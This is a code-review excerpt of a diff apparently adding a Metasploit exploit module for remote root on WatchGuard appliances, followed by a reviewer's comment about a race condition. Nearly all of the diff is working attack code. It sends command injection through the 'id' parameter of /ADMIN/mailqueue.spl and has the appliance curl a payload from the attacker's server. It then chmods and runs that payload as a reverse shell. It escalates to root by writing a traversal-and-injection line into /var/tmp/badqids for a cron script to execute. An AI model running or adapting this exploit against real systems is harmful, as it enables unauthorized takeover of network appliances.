modules/exploits/freebsd/http/watchguard_remote_root.rb

```diff
@@ -0,0 +1,273 @@
+        },
+        'Path' => resource_uri
+    }})
+
+    filename = rand_text_alpha_lower(8)
+    vprint_status("Asking the appliance to download #{service_url}")
+
+    #Use the cmd exec to pull in shell
+    dnld_cmd1 = "/usr/local/sbin/curl -k #{service_url} -o /tmp/#{filename}"
+    vprint_status("Telling appliance to run #{dnld_cmd1}")
+    send_cmd_exec("/ADMIN/mailqueue.spl", sid_cookie, dnld_cmd1)
+    register_file_for_cleanup("/tmp/#{filename}")
+
+    #wait for payload download
+    wait_for_payload
+
+    #Chmod the shell binary
+    chmod_cmd = "chmod +x /tmp/#{filename}"
+    print_status("Chmoding payload #{downfile}...")
+    send_cmd_exec("/ADMIN/mailqueue.spl",sid_cookie, chmod_cmd)
+
+    if(datastore['GETROOT'] == true)
+      print_status("GETROOT set to true, we will use 'FixCorruptMail' privesc")
+      get_root(sid_cookie,filename)
+    else
+      print_status("GETROOT set to false, setting up a shell as 'nobody'")
+
+      #exec revshell straight away
+      exec_cmd = "/tmp/#{filename}"
+      print_status("Running payload #{downfile}...")
+      send_cmd_exec("/ADMIN/mailqueue.spl",sid_cookie, exec_cmd, true)
+    end
+
+  end
+
+  def get_root(sid_cookie,filename)
+    print_status("Rooting can take up to 3 minutes, if you want quicker access retry with GETROOT => false")
+
+    #Touch dummy file as part of privesc
+    touch_cmd="touch /tmp/dummyfile"
+    vprint_status("Creating dummy file...")
+    send_cmd_exec("/ADMIN/mailqueue.spl", sid_cookie, touch_cmd)
+
+    #Put the shell injection line into badqids
+    setup_privesc = "echo \"../../../../../../tmp/dummyfile;/tmp/#{filename}\" > /var/tmp/badqids"
+    send_cmd_exec("/ADMIN/mailqueue.spl", sid_cookie, setup_privesc, true)
+
+    #Need both these files to exploit privesc, delete them once shell opened
+    register_file_for_cleanup("/var/tmp/badqids")
+    register_file_for_cleanup("/tmp/dummyfile")
+
+    #Wait for crontab to run vulnerable script
+    print_status("Badqids created, waiting for vulnerable script to be called by crontab...")
+    select(nil,nil,nil,180) #Wait 3 minutes to ensure cron script is run
+    print_status("Ran out of time, should have root shell by now.")
+
+  end
+
+  def send_cmd_exec(uri,sid_cookie,os_cmd, blocking=false)
+  #This is a handler function that makes HTTP calls to exploit the command injection issue
+    res = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, "#{uri}"),
+        'cookie' => "sid=#{sid_cookie}",
+        'encode_params' => true,
+        'vars_get' => {
+          'f' => 'dnld',
+          'id' => ";#{os_cmd}"
+        }
+    })
+
+    #Handle cmd exec failures
+    if (!res and blocking == false)
+      fail_with(Failure::Unknown, "Unable to deploy payload")
+    else
+      return res
+    end
+  end
+
+    # Handle incoming requests from the server
+  def on_request_uri(cli, request)
+    vprint_status("on_request_uri called: #{request.inspect}")
+    if (not @pl)
```

Comment:
Why not wait until the payload is generated before launching the server in the first place? That avoids the potential race condition.